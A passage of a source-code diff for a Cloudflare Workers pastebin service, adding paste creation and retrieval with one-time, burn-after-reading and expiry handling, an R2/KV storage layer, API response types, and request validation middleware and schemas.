+    const metadata: PasteMetadata = {
+      contentType: adjustedContentType,
+      isOneTime: options.isOneTime,
+      createdAt: Date.now(),
+      filename: options.filename || undefined,
+      expiresAt,
+      remainingReads: options.burnAfterReads,
+      maxReads: options.burnAfterReads,
+    };
+
+    // Store the paste
+    await this.storage.putPaste(id, content, metadata);
+
+    // Set up burn-after-reading tracking if specified
+    if (
+      options.burnAfterReads &&
+      options.burnAfterReads > 0 &&
+      "setupBurnAfterReading" in this.storage
+    ) {
+      await (
+        this.storage as { setupBurnAfterReading: (id: string, maxReads: number) => Promise<void> }
+      ).setupBurnAfterReading(id, options.burnAfterReads);
+    }
+
+    // Build the URL
+    const url = this.buildPasteUrl(
+      id,
+      baseUrl,
+      options.isEncrypted,
+      options.contentType,
+      options.filename,
+    );
+
+    console.log(
+      `[PasteService] Created paste ${id}, encrypted=${options.isEncrypted}, ` +
+        `oneTime=${options.isOneTime}, expires=${expiresAt || "never"}, ` +
+        `burnReads=${options.burnAfterReads || "unlimited"}`,
+    );
+
+    return {
+      id,
+      url,
+      expiresAt,
+      isEncrypted: options.isEncrypted,
+      isBurnAfterReading: !!options.burnAfterReads,
+      remainingReads: options.burnAfterReads,
+    };
+  }
+
+  async getPaste(
+    id: string,
+    isEncrypted: boolean,
+  ): Promise<GetPasteResult | null> {
+    // Check for one-time paste first
+    if (this.storage.isOneTimePasteViewed(id)) {
+      return null;
+    }
+
+    const result = await this.storage.getOneTimePaste(id);
+    if (result) {
+      // This is a one-time paste, mark as viewed
+      await this.storage.markOneTimePasteViewed(id);
+
+      // Get the content before deletion
+      const content = await result.arrayBuffer();
+
+      // Delete the one-time paste
+      await this.storage.deleteOneTimePaste(id);
+
+      let contentType = result.metadata.contentType;
+      if (isEncrypted && contentType !== "application/json") {
+        contentType = "application/json";
+      }
+
+      return {
+        body: new ReadableStream({
+          start(controller) {
+            controller.enqueue(new Uint8Array(content));
+            controller.close();
+          },
+        }),
+        arrayBuffer: async () => content,
+        contentType,
+        filename: result.metadata.filename || "",
+        size: result.size,
+        isOneTime: true,
+        isEncrypted,
+        expiresAt: result.metadata.expiresAt,
+        remainingReads: result.metadata.remainingReads,
+        createdAt: result.metadata.createdAt,
+      };
+    }
+
+    // Try regular paste
+    const paste = await this.storage.getPaste(id);
+    if (!paste) {
+      return null;
+    }
+
+    // Handle burn-after-reading
+    if (paste.metadata.remainingReads !== undefined) {
+      const remaining = await this.storage.decrementReads(id);
+      if (remaining === 0) {
+        // Last read - still return content but it's been deleted
+        const content = await paste.arrayBuffer();
+        let contentType = paste.metadata.contentType;
+        if (isEncrypted && contentType !== "application/json") {
+          contentType = "application/json";
+        }
+        return {
+          body: new ReadableStream({
+            start(controller) {
+              controller.enqueue(new Uint8Array(content));
+              controller.close();
+            },
+          }),
+          arrayBuffer: async () => content,
+          contentType,
+          filename: paste.metadata.filename || "",
+          size: paste.size,
+          isOneTime: false,
+          isEncrypted,
+          expiresAt: paste.metadata.expiresAt,
+          remainingReads: 0,
+          createdAt: paste.metadata.createdAt,
+        };
+      }
+    }
+
+    let contentType = paste.metadata.contentType;
+    if (isEncrypted && contentType !== "application/json") {
+      contentType = "application/json";
+    }
+
+    return {
+      body: paste.body,
+      arrayBuffer: () => paste.arrayBuffer(),
+      contentType,
+      filename: paste.metadata.filename || "",
+      size: paste.size,
+      isOneTime: paste.metadata.isOneTime,
+      isEncrypted,
+      expiresAt: paste.metadata.expiresAt,
+      remainingReads: paste.metadata.remainingReads,
+      createdAt: paste.metadata.createdAt,
+    };
+  }
+
+  async deletePaste(id: string): Promise<void> {
+    await this.storage.deletePaste(id);
+  }
+
+  /**
+   * Build the full URL for a paste.
+   */
+  private buildPasteUrl(
+    id: string,
+    baseUrl: string,
+    isEncrypted: boolean,
+    contentType: string,
+    filename?: string,
+  ): string {
+    if (filename) {
+      const encodedFilename = encodeURIComponent(filename);
+      return isEncrypted
+        ? `${baseUrl}/e/${id}/${encodedFilename}`
+        : `${baseUrl}/${id}/${encodedFilename}`;
+    }
+
+    // For text pastes without filename, add .txt extension
+    const extension = contentType === "text/plain" ? "/paste.txt" : "";
+    return isEncrypted
+      ? `${baseUrl}/e/${id}${extension}`
+      : `${baseUrl}/${id}${extension}`;
+  }
+}

--- a/src/services/storageService.ts
+++ b/src/services/storageService.ts
@@ -1,0 +1,447 @@
+/**
+ * Storage Service - Abstraction layer over R2 and KV storage.
+ *
+ * Provides a clean interface for paste storage operations,
+ * abstracting away the details of R2 object storage and KV metadata.
+ */
+
+/** Metadata stored alongside each paste in R2 custom metadata */
+export interface PasteMetadata {
+  contentType: string;
+  isOneTime: boolean;
+  createdAt: number;
+  filename?: string;
+  /** Expiration timestamp in milliseconds since epoch. Undefined means no expiration. */
+  expiresAt?: number;
+  /** For burn-after-reading: number of reads remaining. Undefined means unlimited reads. */
+  remainingReads?: number;
+  /** Total read count for burn-after-reading tracking */
+  maxReads?: number;
+}
+
+/** Result of a storage get operation */
+export interface StorageGetResult {
+  body: ReadableStream;
+  arrayBuffer: () => Promise<ArrayBuffer>;
+  metadata: PasteMetadata;
+  size: number;
+}
+
+/** Prefix used for one-time paste keys */
+const ONE_TIME_PREFIX = "onetime-";
+
+/** KV key for the viewed-pastes registry */
+const VIEWED_PASTES_KEY = "viewed_pastes_registry";
+
+/** Cloudflare Workers environment bindings */
+export interface StorageEnv {
+  PASTE_BUCKET: R2Bucket;
+  PASTE_METADATA?: KVNamespace;
+  UPLOAD_SESSIONS?: KVNamespace;
+}
+
+/**
+ * Interface for the storage service.
+ * All paste storage operations go through this interface.
+ */
+export interface IStorageService {
+  /**
+   * Store a paste in R2 with metadata.
+   * @param id - The paste ID (without prefix)
+   * @param content - The paste content as ArrayBuffer or string
+   * @param metadata - Metadata to store alongside the paste
+   * @returns The storage key used
+   */
+  putPaste(
+    id: string,
+    content: ArrayBuffer | string,
+    metadata: PasteMetadata,
+  ): Promise<string>;
+
+  /**
+   * Retrieve a paste from R2.
+   * @param id - The paste ID (without prefix)
+   * @returns The paste content and metadata, or null if not found
+   */
+  getPaste(id: string): Promise<StorageGetResult | null>;
+
+  /**
+   * Retrieve a one-time paste from R2.
+   * Returns the paste if it exists and has not yet been viewed.
+   * @param id - The paste ID (without one-time prefix)
+   * @returns The paste content and metadata, or null if not found
+   */
+  getOneTimePaste(id: string): Promise<StorageGetResult | null>;
+
+  /**
+   * Delete a paste from R2.
+   * @param id - The paste ID (with or without prefix)
+   */
+  deletePaste(id: string): Promise<void>;
+
+  /**
+   * Delete a one-time paste from R2 with verification.
+   * Makes multiple deletion attempts and verifies removal.
+   * @param id - The paste ID (without one-time prefix)
+   * @returns Whether deletion was verified
+   */
+  deleteOneTimePaste(id: string): Promise<boolean>;
+
+  /**
+   * Check if a one-time paste has already been viewed.
+   * @param id - The paste ID (without one-time prefix)
+   */
+  isOneTimePasteViewed(id: string): boolean;
+
+  /**
+   * Mark a one-time paste as viewed.
+   * @param id - The paste ID (without one-time prefix)
+   */
+  markOneTimePasteViewed(id: string): Promise<void>;
+
+  /**
+   * Store metadata in KV (optional enhancement).
+   * @param key - The KV key
+   * @param value - The value to store
+   * @param ttlSeconds - Optional TTL in seconds
+   */
+  putMetadata(key: string, value: string, ttlSeconds?: number): Promise<void>;
+
+  /**
+   * Get metadata from KV.
+   * @param key - The KV key
+   */
+  getMetadata(key: string): Promise<string | null>;
+
+  /**
+   * Delete metadata from KV.
+   * @param key - The KV key
+   */
+  deleteMetadata(key: string): Promise<void>;
+
+  /**
+   * Decrement remaining reads for a paste. Returns the new count.
+   * If the count reaches 0, the paste should be deleted.
+   * @param id - The paste ID
+   * @returns The updated remaining reads count, or -1 if not a burn-after-reading paste
+   */
+  decrementReads(id: string): Promise<number>;
+}
+
+/** Tracker for viewed one-time pastes (in-memory) */
+interface ViewedPasteTracker {
+  [key: string]: {
+    viewedAt: number;
+    deleted: boolean;
+    attempts: number;
+  };
+}
+
+/**
+ * Concrete implementation of the storage service using R2 and KV.
+ */
+export class StorageService implements IStorageService {
+  private env: StorageEnv;
+  private viewedPastes: ViewedPasteTracker = {};
+
+  constructor(env: StorageEnv) {
+    this.env = env;
+  }
+
+  /**
+   * Initialize the service by loading viewed paste state from KV.
+   */
+  async initialize(): Promise<void> {
+    if (this.env.PASTE_METADATA) {
+      try {
+        const stored = await this.env.PASTE_METADATA.get(VIEWED_PASTES_KEY);
+        if (stored) {
+          const parsed = JSON.parse(stored) as ViewedPasteTracker;
+          Object.assign(this.viewedPastes, parsed);
+        }
+      } catch (error) {
+        console.log(
+          "[StorageService] Optional paste metadata storage not available:",
+          error,
+        );
+      }
+    }
+  }
+
+  /** Build the storage key for one-time pastes */
+  private oneTimeKey(id: string): string {
+    return `${ONE_TIME_PREFIX}${id}`;
+  }
+
+  async putPaste(
+    id: string,
+    content: ArrayBuffer | string,
+    metadata: PasteMetadata,
+  ): Promise<string> {
+    const key = metadata.isOneTime ? this.oneTimeKey(id) : id;
+
+    await this.env.PASTE_BUCKET.put(key, content, {
+      customMetadata: metadata as unknown as Record<string, string>,
+    });
+
+    console.log(
+      `[StorageService] Created paste ${key}, isOneTime=${metadata.isOneTime}`,
+    );
+
+    return key;
+  }
+
+  async getPaste(id: string): Promise<StorageGetResult | null> {
+    // First try one-time paste
+    const oneTimeResult = await this.getOneTimePaste(id);
+    if (oneTimeResult) {
+      return oneTimeResult;
+    }
+
+    // Then try regular paste
+    const object = await this.env.PASTE_BUCKET.get(id);
+    if (!object) {
+      return null;
+    }
+
+    const metadata = this.extractMetadata(object);
+
+    // Check if paste has expired
+    if (metadata.expiresAt && Date.now() > metadata.expiresAt) {
+      // Paste has expired, delete it and return null
+      await this.env.PASTE_BUCKET.delete(id);
+      console.log(`[StorageService] Paste ${id} has expired, deleting`);
+      return null;
+    }
+
+    return {
+      body: object.body,
+      arrayBuffer: () => object.arrayBuffer(),
+      metadata,
+      size: object.size,
+    };
+  }
+
+  async getOneTimePaste(id: string): Promise<StorageGetResult | null> {
+    const key = this.oneTimeKey(id);
+
+    // Check if already viewed in memory
+    if (this.isOneTimePasteViewed(id)) {
+      return null;
+    }
+
+    const object = await this.env.PASTE_BUCKET.get(key);
+    if (!object) {
+      return null;
+    }
+
+    const metadata = this.extractMetadata(object);
+    // Ensure the isOneTime flag is set
+    metadata.isOneTime = true;
+
+    // Check if paste has expired
+    if (metadata.expiresAt && Date.now() > metadata.expiresAt) {
+      await this.env.PASTE_BUCKET.delete(key);
+      console.log(
+        `[StorageService] One-time paste ${id} has expired, deleting`,
+      );
+      return null;
+    }
+
+    return {
+      body: object.body,
+      arrayBuffer: () => object.arrayBuffer(),
+      metadata,
+      size: object.size,
+    };
+  }
+
+  async deletePaste(id: string): Promise<void> {
+    await this.env.PASTE_BUCKET.delete(id);
+  }
+
+  async deleteOneTimePaste(id: string): Promise<boolean> {
+    const key = this.oneTimeKey(id);
+
+    try {
+      // First deletion attempt
+      await this.env.PASTE_BUCKET.delete(key);
+      console.log(`[StorageService] First deletion attempt for ${key}`);
+
+      // Small delay for propagation
+      await new Promise((resolve) => setTimeout(resolve, 50));
+
+      // Second deletion attempt
+      await this.env.PASTE_BUCKET.delete(key);
+
+      // Verify deletion
+      const check = await this.env.PASTE_BUCKET.get(key);
+      if (!check) {
+        console.log(
+          `[StorageService] Successfully deleted one-time paste ${key}`,
+        );
+        if (key in this.viewedPastes) {
+          this.viewedPastes[key].deleted = true;
+          this.viewedPastes[key].attempts++;
+        }
+        await this.persistViewedPastes();
+        return true;
+      }
+
+      // Force another attempt
+      await this.env.PASTE_BUCKET.delete(key);
+      if (key in this.viewedPastes) {
+        this.viewedPastes[key].deleted = false;
+        this.viewedPastes[key].attempts++;
+      }
+      await this.persistViewedPastes();
+      return false;
+    } catch (error) {
+      console.error(
+        `[StorageService] Error deleting one-time paste ${key}: ${error}`,
+      );
+      return false;
+    }
+  }
+
+  isOneTimePasteViewed(id: string): boolean {
+    const key = this.oneTimeKey(id);
+    return key in this.viewedPastes;
+  }
+
+  async markOneTimePasteViewed(id: string): Promise<void> {
+    const key = this.oneTimeKey(id);
+    this.viewedPastes[key] = {
+      viewedAt: Date.now(),
+      deleted: false,
+      attempts: 0,
+    };
+    await this.persistViewedPastes();
+  }
+
+  async putMetadata(
+    key: string,
+    value: string,
+    ttlSeconds?: number,
+  ): Promise<void> {
+    if (!this.env.PASTE_METADATA) {
+      return;
+    }
+    try {
+      const options: KVNamespacePutOptions = {};
+      if (ttlSeconds) {
+        options.expirationTtl = ttlSeconds;
+      }
+      await this.env.PASTE_METADATA.put(key, value, options);
+    } catch (error) {
+      console.log(`[StorageService] KV put failed for ${key}: ${error}`);
+    }
+  }
+
+  async getMetadata(key: string): Promise<string | null> {
+    if (!this.env.PASTE_METADATA) {
+      return null;
+    }
+    try {
+      return await this.env.PASTE_METADATA.get(key);
+    } catch (error) {
+      console.log(`[StorageService] KV get failed for ${key}: ${error}`);
+      return null;
+    }
+  }
+
+  async deleteMetadata(key: string): Promise<void> {
+    if (!this.env.PASTE_METADATA) {
+      return;
+    }
+    try {
+      await this.env.PASTE_METADATA.delete(key);
+    } catch (error) {
+      console.log(`[StorageService] KV delete failed for ${key}: ${error}`);
+    }
+  }
+
+  async decrementReads(id: string): Promise<number> {
+    // Look for the paste's metadata in KV to track reads
+    const metadataKey = `reads:${id}`;
+    const stored = await this.getMetadata(metadataKey);
+
+    if (!stored) {
+      return -1; // Not a burn-after-reading paste
+    }
+
+    const data = JSON.parse(stored) as {
+      remaining: number;
+      max: number;
+    };
+    data.remaining = Math.max(0, data.remaining - 1);
+
+    if (data.remaining <= 0) {
+      // Delete the paste and its metadata
+      await this.deletePaste(id);
+      await this.deleteMetadata(metadataKey);
+      console.log(
+        `[StorageService] Burn-after-reading paste ${id} exhausted, deleting`,
+      );
+      return 0;
+    }
+
+    await this.putMetadata(metadataKey, JSON.stringify(data));
+    return data.remaining;
+  }
+
+  /**
+   * Set up burn-after-reading tracking for a paste.
+   * @param id - The paste ID
+   * @param maxReads - Maximum number of reads allowed
+   */
+  async setupBurnAfterReading(id: string, maxReads: number): Promise<void> {
+    const metadataKey = `reads:${id}`;
+    const data = { remaining: maxReads, max: maxReads };
+    await this.putMetadata(metadataKey, JSON.stringify(data));
+  }
+
+  /** Extract PasteMetadata from an R2 object */
+  private extractMetadata(object: R2Object | R2ObjectBody): PasteMetadata {
+    try {
+      const custom = object.customMetadata as unknown as Record<
+        string,
+        string
+      >;
+      return {
+        contentType: custom?.contentType || "text/plain",
+        isOneTime: custom?.isOneTime === "true",
+        createdAt: Number(custom?.createdAt) || Date.now(),
+        filename: custom?.filename || undefined,
+        expiresAt: custom?.expiresAt ? Number(custom.expiresAt) : undefined,
+        remainingReads: custom?.remainingReads
+          ? Number(custom.remainingReads)
+          : undefined,
+        maxReads: custom?.maxReads ? Number(custom.maxReads) : undefined,
+      } as PasteMetadata;
+    } catch (err) {
+      console.error(`[StorageService] Error extracting metadata: ${err}`);
+      return {
+        contentType: "text/plain",
+        isOneTime: false,
+        createdAt: Date.now(),
+      };
+    }
+  }
+
+  /** Persist the viewed pastes tracker to KV */
+  private async persistViewedPastes(): Promise<void> {
+    if (this.env.PASTE_METADATA) {
+      try {
+        await this.env.PASTE_METADATA.put(
+          VIEWED_PASTES_KEY,
+          JSON.stringify(this.viewedPastes),
+        );
+      } catch (error) {
+        console.log(
+          `[StorageService] Failed to persist viewed pastes: ${error}`,
+        );
+      }
+    }
+  }
+}

--- a/src/types/index.ts
+++ b/src/types/index.ts
@@ -76,7 +76,11 @@ export interface PasteOptions {
   silent?: boolean;
   output?: string;
   burn?: boolean;
+  /** Burn-after-reading count: number of reads before auto-deletion */
+  burnCount?: number;
   password?: string;
+  /** Expiration duration (e.g., "1h", "24h", "7d", "30d") */
+  expire?: string;
 }
 
 export interface PasteResponse {
@@ -85,6 +89,83 @@ export interface PasteResponse {
   expiresAt?: string;
   encrypted?: boolean;
   requiresPassword?: boolean;
+  /** Whether burn-after-reading is active */
+  isBurnAfterReading?: boolean;
+  /** Remaining reads before auto-deletion */
+  remainingReads?: number;
+}
+
+// ============================================
+// API v1 Response Types
+// ============================================
+
+/** Standard API v1 response wrapper */
+export interface ApiV1Response<T = unknown> {
+  success: boolean;
+  data?: T;
+  error?: {
+    code: string;
+    message: string;
+    details?: Array<{
+      field: string;
+      message: string;
+      code: string;
+    }>;
+  };
+}
+
+/** API v1 paste creation response */
+export interface ApiV1PasteCreated {
+  id: string;
+  url: string;
+  isEncrypted: boolean;
+  isBurnAfterReading: boolean;
+  expiresAt?: string;
+  remainingReads?: number;
+}
+
+/** API v1 paste retrieval response */
+export interface ApiV1PasteData {
+  id: string;
+  content: string;
+  contentType: string;
+  filename: string | null;
+  size: number;
+  isOneTime: boolean;
+  isEncrypted: boolean;
+  createdAt: string;
+  expiresAt?: string;
+  remainingReads?: number;
+}
+
+/** API v1 health check response */
+export interface ApiV1HealthResponse {
+  status: "healthy" | "degraded" | "unhealthy";
+  version: string;
+  timestamp: string;
+  services: {
+    storage: "available" | "unavailable";
+    encryption: "available" | "unavailable";
+  };
+}
+
+// ============================================
+// Paste Lifecycle Types
+// ============================================
+
+/** Valid expiration duration presets */
+export type ExpirationPreset = "1h" | "6h" | "12h" | "24h" | "48h" | "7d" | "14d" | "30d";
+
+/** Paste lifecycle configuration */
+export interface PasteLifecycle {
+  /** When the paste expires (ISO 8601) */
+  expiresAt?: string;
+  /** Number of reads remaining for burn-after-reading */
+  remainingReads?: number;
+  /** Maximum reads for burn-after-reading */
+  maxReads?: number;
+  /** Whether the paste is a one-time paste */
+  isOneTime: boolean;
 }
 
 // PGP types

--- a/src/validation/index.ts
+++ b/src/validation/index.ts
@@ -1,0 +1,36 @@
+/**
+ * Validation Module - Central export for all validation utilities.
+ */
+
+export type {
+  ValidationResult,
+  ValidationErrorDetail,
+  TextUploadInput,
+  WebUploadInput,
+  MultipartInitInput,
+  ApiV1CreatePasteInput,
+} from "./schemas";
+
+export {
+  validateTextUpload,
+  validateWebUpload,
+  validateMultipartInit,
+  validateApiV1CreatePaste,
+  formatValidationErrors,
+} from "./schemas";
+
+export type {
+  ApiErrorResponse,
+  ApiSuccessResponse,
+  ApiResponse,
+} from "./middleware";
+
+export {
+  errorResponse,
+  successResponse,
+  checkValidation,
+  parseJsonBody,
+  validateMethod,
+  notFoundResponse,
+  internalErrorResponse,
+} from "./middleware";

--- a/src/validation/middleware.ts
+++ b/src/validation/middleware.ts
@@ -1,0 +1,148 @@
+/**
+ * Validation Middleware
+ *
+ * Provides middleware functions that validate incoming requests
+ * and return clear error responses when validation fails.
+ */
+
+import type { ValidationResult, ValidationErrorDetail } from "./schemas";
+
+/** Standard JSON error response format */
+export interface ApiErrorResponse {
+  success: false;
+  error: {
+    code: string;
+    message: string;
+    details?: ValidationErrorDetail[];
+  };
+}
+
+/** Standard JSON success response format */
+export interface ApiSuccessResponse<T> {
+  success: true;
+  data: T;
+}
+
+/** Union type for API responses */
+export type ApiResponse<T> = ApiSuccessResponse<T> | ApiErrorResponse;
+
+/**
+ * Create a JSON error response with CORS headers.
+ */
+export function errorResponse(
+  statusCode: number,
+  code: string,
+  message: string,
+  details?: ValidationErrorDetail[],
+): Response {
+  const body: ApiErrorResponse = {
+    success: false,
+    error: {
+      code,
+      message,
+      ...(details ? { details } : {}),
+    },
+  };
+
+  return new Response(JSON.stringify(body), {
+    status: statusCode,
+    headers: {
+      "Content-Type": "application/json",
+      "Access-Control-Allow-Origin": "*",
+    },
+  });
+}
+
+/**
+ * Create a JSON success response with CORS headers.
+ */
+export function successResponse<T>(data: T, statusCode = 200): Response {
+  const body: ApiSuccessResponse<T> = {
+    success: true,
+    data,
+  };
+
+  return new Response(JSON.stringify(body), {
+    status: statusCode,
+    headers: {
+      "Content-Type": "application/json",
+      "Access-Control-Allow-Origin": "*",
+    },
+  });
+}
+
+/**
+ * Check a validation result and return an error response if it failed.
+ * Returns null if validation passed, allowing the caller to continue.
+ */
+export function checkValidation<T>(
+  result: ValidationResult<T>,
+): Response | null {
+  if (!result.success) {
+    const message =
+      result.errors?.map((e) => `${e.field}: ${e.message}`).join("; ") ||
+      "Validation failed";
+
+    return errorResponse(
+      400,
+      "VALIDATION_ERROR",
+      message,
+      result.errors,
+    );
+  }
+  return null;
+}
+
+/**
+ * Parse a JSON request body safely.
+ * Returns an error response if parsing fails.
+ */
+export async function parseJsonBody(
+  request: Request,
+): Promise<{ data: unknown } | { error: Response }> {
+  try {
+    const data = await request.json();
+    return { data };
+  } catch {
+    return {
+      error: errorResponse(
+        400,
+        "INVALID_JSON",
+        "Request body must be valid JSON",
+      ),
+    };
+  }
+}
+
+/**
+ * Validate that the request method matches expectations.
+ */
+export function validateMethod(
+  request: Request,
+  allowed: string[],
+): Response | null {
+  if (!allowed.includes(request.method)) {
+    return errorResponse(
+      405,
+      "METHOD_NOT_ALLOWED",
+      `Method ${request.method} not allowed. Allowed: ${allowed.join(", ")}`,
+    );
+  }
+  return null;
+}
+
+/**
+ * Create a 404 Not Found response.
+ */
+export function notFoundResponse(message = "Resource not found"): Response {
+  return errorResponse(404, "NOT_FOUND", message);
+}
+
+/**
+ * Create a 500 Internal Server Error response.
+ */
+export function internalErrorResponse(
+  message = "Internal server error",
+): Response {
+  return errorResponse(500, "INTERNAL_ERROR", message);
+}

--- a/src/validation/schemas.ts
+++ b/src/validation/schemas.ts
@@ -1,0 +1,541 @@
+/**
+ * Request Validation Schemas
+ *
+ * Provides type-safe validation for all API request payloads.
+ * Uses a lightweight validation approach compatible with Cloudflare Workers
+ * without requiring the full Zod runtime.
+ */
+
+/** Validation error details */
+export interface ValidationErrorDetail {
+  field: string;
+  message: string;
+  code: string;
+}
+
+/** Result of a validation operation */
+export interface ValidationResult<T> {
+  success: boolean;
+  data?: T;
+  errors?: ValidationErrorDetail[];
+}
+
+/**
+ * Create a successful validation result.
+ */
+function success<T>(data: T): ValidationResult<T> {
+  return { success: true, data };
+}
+
+/**
+ * Create a failed validation result.
+ */
+function failure<T>(errors: ValidationErrorDetail[]): ValidationResult<T> {
+  return { success: false, errors };
+}
+
+// ============================================
+// Paste Upload Schemas
+// ============================================
+
+/** Valid expiration duration values */
+const VALID_EXPIRE_DURATIONS = [
+  "5m",
+  "15m",
+  "30m",
+  "1h",
+  "6h",
+  "12h",
+  "24h",
+  "48h",
+  "7d",
+  "14d",
+  "30d",
+];
+
+/** Maximum paste content size (25MB for direct upload) */
+const MAX_PASTE_SIZE = 25 * 1024 * 1024;
+
+/** Maximum burn-after-reading count */
+const MAX_BURN_READS = 100;
+
+/** Schema for text upload via API */
+export interface TextUploadInput {
+  content: string;
+  oneTime?: boolean;
+  isEncrypted?: boolean;
+  expireDuration?: string;
+  burnAfterReads?: number;
+}
+
+/**
+ * Validate a text upload request body.
+ */
+export function validateTextUpload(
+  body: unknown,
+): ValidationResult<TextUploadInput> {
+  const errors: ValidationErrorDetail[] = [];
+
+  if (typeof body !== "object" || body === null) {
+    return failure([
+      {
+        field: "body",
+        message: "Request body must be a JSON object",
+        code: "invalid_type",
+      },
+    ]);
+  }
+
+  const obj = body as Record<string, unknown>;
+
+  // content: required string, non-empty
+  if (typeof obj.content !== "string") {
+    errors.push({
+      field: "content",
+      message: "Content is required and must be a string",
+      code: "required",
+    });
+  } else if (obj.content.length === 0) {
+    errors.push({
+      field: "content",
+      message: "Content cannot be empty",
+      code: "too_small",
+    });
+  } else if (new TextEncoder().encode(obj.content).length > MAX_PASTE_SIZE) {
+    errors.push({
+      field: "content",
+      message: `Content exceeds maximum size of ${MAX_PASTE_SIZE} bytes`,
+      code: "too_big",
+    });
+  }
+
+  // oneTime: optional boolean
+  if (obj.oneTime !== undefined && typeof obj.oneTime !== "boolean") {
+    errors.push({
+      field: "oneTime",
+      message: "oneTime must be a boolean",
+      code: "invalid_type",
+    });
+  }
+
+  // isEncrypted: optional boolean
+  if (obj.isEncrypted !== undefined && typeof obj.isEncrypted !== "boolean") {
+    errors.push({
+      field: "isEncrypted",
+      message: "isEncrypted must be a boolean",
+      code: "invalid_type",
+    });
+  }
+
+  // expireDuration: optional string, must be valid duration
+  if (obj.expireDuration !== undefined) {
+    if (typeof obj.expireDuration !== "string") {
+      errors.push({
+        field: "expireDuration",
+        message: "expireDuration must be a string",
+        code: "invalid_type",
+      });
+    } else if (!isValidDuration(obj.expireDuration)) {
+      errors.push({
+        field: "expireDuration",
+        message: `Invalid duration. Valid options: ${VALID_EXPIRE_DURATIONS.join(", ")}, or a custom duration like "2h", "3d"`,
+        code: "invalid_enum_value",
+      });
+    }
+  }
+
+  // burnAfterReads: optional number, must be positive integer
+  if (obj.burnAfterReads !== undefined) {
+    if (typeof obj.burnAfterReads !== "number") {
+      errors.push({
+        field: "burnAfterReads",
+        message: "burnAfterReads must be a number",
+        code: "invalid_type",
+      });
+    } else if (
+      !Number.isInteger(obj.burnAfterReads) ||
+      obj.burnAfterReads < 1
+    ) {
+      errors.push({
+        field: "burnAfterReads",
+        message: "burnAfterReads must be a positive integer",
+        code: "too_small",
+      });
+    } else if (obj.burnAfterReads > MAX_BURN_READS) {
+      errors.push({
+        field: "burnAfterReads",
+        message: `burnAfterReads cannot exceed ${MAX_BURN_READS}`,
+        code: "too_big",
+      });
+    }
+  }
+
+  if (errors.length > 0) {
+    return failure(errors);
+  }
+
+  return success({
+    content: obj.content as string,
+    oneTime: (obj.oneTime as boolean) || false,
+    isEncrypted: (obj.isEncrypted as boolean) || false,
+    expireDuration: obj.expireDuration as string | undefined,
+    burnAfterReads: obj.burnAfterReads as number | undefined,
+  });
+}
+
+// ============================================
+// Web Upload Schema
+// ============================================
+
+/** Schema for web file upload */
+export interface WebUploadInput {
+  file: File;
+  oneTime: boolean;
+  expireDuration?: string;
+  burnAfterReads?: number;
+}
+
+/**
+ * Validate a web file upload request (FormData).
+ */
+export function validateWebUpload(
+  formData: FormData,
+): ValidationResult<WebUploadInput> {
+  const errors: ValidationErrorDetail[] = [];
+
+  const file = formData.get("file");
+  if (!file || !(file instanceof File)) {
+    errors.push({
+      field: "file",
+      message: "A file is required",
+      code: "required",
+    });
+  } else if (file.size === 0) {
+    errors.push({
+      field: "file",
+      message: "File cannot be empty",
+      code: "too_small",
+    });
+  } else if (file.size > MAX_PASTE_SIZE) {
+    errors.push({
+      field: "file",
+      message: `File exceeds maximum size of ${MAX_PASTE_SIZE} bytes. Use multipart upload for larger files.`,
+      code: "too_big",
+    });
+  }
+
+  const oneTimeStr = formData.get("oneTime");
+  const oneTime = oneTimeStr === "true";
+
+  const expireDuration = formData.get("expireDuration") as string | null;
+  if (expireDuration && !isValidDuration(expireDuration)) {
+    errors.push({
+      field: "expireDuration",
+      message: `Invalid duration. Valid options: ${VALID_EXPIRE_DURATIONS.join(", ")}`,
+      code: "invalid_enum_value",
+    });
+  }
+
+  const burnAfterReadsStr = formData.get("burnAfterReads") as string | null;
+  let burnAfterReads: number | undefined;
+  if (burnAfterReadsStr) {
+    burnAfterReads = parseInt(burnAfterReadsStr, 10);
+    if (isNaN(burnAfterReads) || burnAfterReads < 1) {
+      errors.push({
+        field: "burnAfterReads",
+        message: "burnAfterReads must be a positive integer",
+        code: "invalid_type",
+      });
+    } else if (burnAfterReads > MAX_BURN_READS) {
+      errors.push({
+        field: "burnAfterReads",
+        message: `burnAfterReads cannot exceed ${MAX_BURN_READS}`,
+        code: "too_big",
+      });
+    }
+  }
+
+  if (errors.length > 0) {
+    return failure(errors);
+  }
+
+  return success({
+    file: file as File,
+    oneTime,
+    expireDuration: expireDuration || undefined,
+    burnAfterReads,
+  });
+}
+
+// ============================================
+// Multipart Upload Schemas
+// ============================================
+
+/** Schema for multipart upload init request */
+export interface MultipartInitInput {
+  filename: string;
+  contentType: string;
+  totalSize: number;
+  totalParts: number;
+  isOneTime?: boolean;
+  isEncrypted?: boolean;
+  encryptionMetadata?: Record<string, unknown>;
+}
+
+/**
+ * Validate a multipart upload init request.
+ */
+export function validateMultipartInit(
+  body: unknown,
+): ValidationResult<MultipartInitInput> {
+  const errors: ValidationErrorDetail[] = [];
+
+  if (typeof body !== "object" || body === null) {
+    return failure([
+      {
+        field: "body",
+        message: "Request body must be a JSON object",
+        code: "invalid_type",
+      },
+    ]);
+  }
+
+  const obj = body as Record<string, unknown>;
+
+  // filename: required string
+  if (typeof obj.filename !== "string" || obj.filename.length === 0) {
+    errors.push({
+      field: "filename",
+      message: "filename is required",
+      code: "required",
+    });
+  }
+
+  // contentType: required string
+  if (typeof obj.contentType !== "string" || obj.contentType.length === 0) {
+    errors.push({
+      field: "contentType",
+      message: "contentType is required",
+      code: "required",
+    });
+  }
+
+  // totalSize: required positive number
+  if (typeof obj.totalSize !== "number" || obj.totalSize <= 0) {
+    errors.push({
+      field: "totalSize",
+      message: "totalSize must be a positive number",
+      code: "invalid_type",
+    });
+  }
+
+  // totalParts: required positive integer
+  if (
+    typeof obj.totalParts !== "number" ||
+    !Number.isInteger(obj.totalParts) ||
+    obj.totalParts < 1
+  ) {
+    errors.push({
+      field: "totalParts",
+      message: "totalParts must be a positive integer",
+      code: "invalid_type",
+    });
+  }
+
+  if (errors.length > 0) {
+    return failure(errors);
+  }
+
+  return success({
+    filename: obj.filename as string,
+    contentType: obj.contentType as string,
+    totalSize: obj.totalSize as number,
+    totalParts: obj.totalParts as number,
+    isOneTime: (obj.isOneTime as boolean) || false,
+    isEncrypted: (obj.isEncrypted as boolean) || false,
+    encryptionMetadata: obj.encryptionMetadata as
+      | Record<string, unknown>
+      | undefined,
+  });
+}
+
+// ============================================
+// API v1 Schemas
+// ============================================
+
+/** Schema for API v1 paste creation */
+export interface ApiV1CreatePasteInput {
+  content: string;
+  contentType?: string;
+  filename?: string;
